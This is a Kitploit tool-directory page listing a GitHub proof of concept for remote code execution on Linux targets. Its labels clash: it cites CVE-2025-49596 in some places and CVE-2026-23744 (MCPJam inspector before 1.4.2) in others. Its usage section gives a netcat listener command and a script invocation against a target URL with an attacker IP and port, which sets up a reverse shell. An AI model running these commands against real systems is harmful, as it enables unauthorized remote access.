Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-49596-PoC — PoC for CVE-2025-49596 on linux targets | Kitploit
Tools/GitHubGitHub/pppxo/cve-2025-49596-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubpppxo/cve-2025-49596-poc

CVE-2025-49596-PoC

PoC for CVE-2025-49596 on linux targets

View Repository
4 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-23744-PoC

Automated PoC for CVE-2026-23744 (RCE on MCPJam inspector prior to 1.4.2) on linux targets

How to use

root@kitploit:~
# use netcat to run listener on any port like 9002.
nc -nvlp 9002

# use the automation like this
python3 CVE-2025-49596.py https://mcpjam-server.com <attacker-ip> <attacker-port>
Download Tool